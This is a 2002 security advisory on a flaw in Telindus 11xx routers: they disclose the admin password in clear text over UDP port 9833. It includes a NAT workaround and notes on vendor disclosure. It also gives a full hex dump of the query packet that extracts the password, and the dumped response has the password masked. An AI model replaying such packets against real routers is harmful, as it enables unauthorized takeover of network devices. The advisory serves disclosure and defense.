COMMAND

	Telindus 11xx router series vulnerabilities

SYSTEMS AFFECTED

	Telindus 11xx router series

PROBLEM

	finelli@ieee.org and kurgan@tigerteam.it found following:
	

	The 11xx router series by Telindus (http://www.telindus.com) has a  very
	serious remotely  exploitable  compromise,  due  to  the  fact  that  an
	intruder may mimic the behaviour of a  desktop  management  application,
	thus getting control of the router.
	

	

	The 11xx router series has a  management  program,  freely  downloadable
	from the Telindus site, that allows to remotely administer the router.
	

	This program tries to discovery router boxes  in  the  LAN  through  UDP
	broadcast. Next it sends another different UDP  unicast  packet  to  the
	answering boxes, to which the router answers with  an  UDP  packet  that
	contains, among the others, the software  revision  number,  the  router
	name and the password for accessing the device.
	

	All the information are clear text. All the traffic happens on UDP  port
	9833.
	

	It is possible to exploit this behaviour in a billion ways: on a LAN  it
	is enough to download and  run  the  administration  tool  while  simply
	sniffing the traffic. On a WAN  it  is  enough  to  craft  an  hand-made
	packet that queries the router in the same way  the  management  program
	does.
	

	As an example, this is the complete dump (with the Ethernet frame) of  a
	``request\'\' packet. The payload is the last 62 bytes,  beginning  from
	``19 73 04\'\',  the  sender  address  is  172.16.0.16  and  the  router
	(recipient) is 172.16.0.253:
	

	

	00 60 6C 1D BD 7E 00 00 86 60 62 F7 08 00 45 00

	00 52 01 52 00 00 80 11 E0 1B AC 10 00 10 AC 10

	00 FD 26 69 26 69 00 3E A8 DA 19 73 04 17 73 30

	00 01 00 01 01 00 01 01 01 02 01 33 01 13 01 16

	04 08 04 15 01 0D 01 0E 01 14 40 03 40 04 01 26

	01 27 01 28 01 30 01 44 42 05 42 22 04 18 FF FF

	

	

	

	This is the dump of an ``answer\'\' packet (with  the  Ethernet  frame).
	The payload is the last 204 bytes, beginning from ``19  73  04\'\'.  The
	password has been replaced by ``x\'\'
	

	

	00 00 86 60 62 F7 00 60 6C 1D BD 7E 08 00 45 00

	00 E0 25 9D 00 00 63 11 D8 42 AC 10 00 FD AC 10

	00 10 26 69 26 69 00 CC 00 00 19 73 04 17 73 30

	00 03 00 01 01 00 00 05 45 51 43 41 59 01 01 00

	0D xx xx xx xx xx xx xx xx xx xx xx xx xx 01 02

	00 32 4E 44 31 30 36 30 56 45 2D 54 4C 49 2C 20

	76 65 72 20 35 2E 33 2E 31 31 42 3B 54 68 75 20

	44 65 63 20 20 36 20 31 36 3A 33 36 3A 33 33 20

	32 30 30 31 01 33 00 02 00 3C 01 13 00 06 00 60

	6C 1D BD 7E 01 16 00 06 00 00 86 60 62 F7 04 08

	00 02 00 01 04 15 00 02 00 FF 01 0D 00 04 00 00

	00 00 01 0E 00 04 00 00 00 00 01 14 00 02 00 00

	40 03 00 02 00 00 40 04 00 02 00 00 01 26 00 00

	01 27 00 00 01 28 00 00 01 30 00 02 00 02 01 44

	00 00 42 05 00 00 42 22 00 00 04 18 00 00

	

	

SOLUTION

	We have not been  able  to  understand  if  this  ``feature\'\'  can  be
	disabled. Otherwise, it seems that the only solution would be to  filter
	the traffic on UDP port 9833 directed to the box.
	

	A quick and  dirty  workaround  is  to  redirect  WAN  traffic  to  port
	9833/udp to another IP address in the LAN, better  if  it\'s  an  unused
	one. This can be achieved by telnetting to the router, logging  in,  and
	issuing  the  followind  command:  ``add  auto  udp   9833   9833   9833
	10.0.0.10\'\', where 10.0.0.10 is some unused IP address  in  your  LAN.
	This sets up a static NAT  rule  that  redirects  traffic  entering  WAN
	interface. Then, you must also enter  the  command  ``save\'\'  to  save
	your configuration to NVRAM. You can optionally check the status of  the
	NAT table by issuing ``show auto\'\'. If you made some mistake, you  can
	``del auto <number>\'\', and  then  retry.  Maybe  there  are  better
	methods, we used this one because of we already  knew  how  to  use  the
	command ``auto\'\'.
	

	

	 Notes

	 =====

	

	We contacted Telindus, through their Italian office. They told  us  that
	they are actively working on this issue.  We  told  them  that  after  a
	month we would have informed the security community of the problem.
	

	Telindus told  us  that  a  beta  version  of  the  firmware  should  be
	available soon. Last but not least, the banner of  the  router  has  the
	word Arescom in it, so  perhaps  other  devices  from  that  vendor  are
	exploitable: we have none at our disposition, so we have not  been  able
	to check.
	

	

	 Disclaimer

	 ==========

	

	Strangely enough we have been able to discover this problem in spite  of
	DMCA and similar initiatives, since we did  not  even  need  to  reverse
	engineer the code of any application:  we  were  simply  monitoring  the
	network for totally unrelated issues and we happened to log a  ``strange
	communication\'\' on the UDP port 9833. Notice that the  payload  is  in
	clear text and that the juxtaposition of the router name and of  a  text
	string leaves little to imagination.
	

	(C) 2002 finelli@ieee.org, kurgan@tigerteam.it